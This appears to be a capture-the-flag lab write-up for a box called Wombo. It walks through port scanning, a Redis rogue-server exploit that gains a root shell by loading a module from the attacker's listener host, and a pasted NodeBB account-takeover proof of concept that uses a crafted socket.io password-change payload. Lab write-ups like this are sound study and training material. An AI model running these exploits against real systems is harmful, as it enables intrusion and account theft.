Malleum Knowledge Base

Wombo

3 min read

Starting with the rustscan

rustscan -a $IP -- -Pn -sC -sV

The initial results shows five ports open.

Port 22

openSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)

Port 80

port 80 shows a HTTP server running using nginx 1.10.3

Port 6379

Redis key-value store 5.0.9

Exploitation

RCE

Searching for exploits we come across https://github.com/n0b0dyCN/redis-rogue-server. This should allow us to easily create a rogue redis server that leads to an elevated shell. Let’s go ahead and clone this repository to our local kali host and move into that directory.

┌──(kali㉿kali)-[~]
└─$ git clone https://github.com/n0b0dyCN/redis-rogue-server.git
Cloning into 'redis-rogue-server'...
remote: Enumerating objects: 83, done.
remote: Total 83 (delta 0), reused 0 (delta 0), pack-reused 83
Receiving objects: 100% (83/83), 242.26 KiB | 2.72 MiB/s, done.
Resolving deltas: 100% (19/19), done.

┌──(kali㉿kali)-[~]
└─$ cd redis-rogue-server                  

┌──(kali㉿kali)-[~/redis-rogue-server]
└─$ ls
exp.so  LICENSE  README.md  RedisModulesSDK  redis-rogue-server.py

Following the instructions in the repository, we can try to spawn a root shell using the python script redis-rogue-server.py.

┌──(kali㉿kali)-[~/redis-rogue-server]
└─$ python3 redis-rogue-server.py --rhost 192.168.120.111 --rport 6379 --lhost 192.168.118.14 --lport 6379
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig

[info] TARGET 192.168.120.111:6379
[info] SERVER 192.168.118.14:6379
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: i
[info] Interact mode start, enter "exit" to quit.
[<<] id
[>>] =uid=0(root) gid=0(root) groups=0(root)
[<<] whoami
[>>] root
[<<]

Success! We now have root access on the target system.

Port 8080

Running HTTP Proxy

# Exploit Title:  NodeBB Forum 1.12.2-1.14.2 - Account Takeover
# Date: 2020-08-18
# Exploit Author: Muhammed Eren Uygun
# Vendor Homepage: https://nodebb.org/
# Software Link: https://github.com/NodeBB/NodeBB
# Version: 1.12.2-1.14.2
# Tested on: Linux
# CVE : CVE-2020-15149 - https://github.com/NodeBB/NodeBB/security/advisories/GHSA-hr66-c8pg-5mg7
Impact:
----------------------
A bug in this validation logic made it possible to change the password of any user on a running NodeBB forum by sending a specially crafted socket.io call to the server. This could lead to a privilege escalation event due via an account takeover.
 
Bug PoC:
----------------------
Blog: https://medium.com/bugbountywriteup/privilege-escalation-via-account-takeover-on-nodebb-forum-software-512-a593a7b1b4a4
1- Create a user
2- Go to password change page
3- Change password with proxy
427["user.changePassword",("currentPassword":"Test.12345!","newPassword":"Admin123!","uid":5)])
4- Replace the uid on the request with 1, which is the uid value of the admin user, and send the request.
5-  So you can login with this password to admin user.

Port 27017

running mongodb 4.0.18

Graph View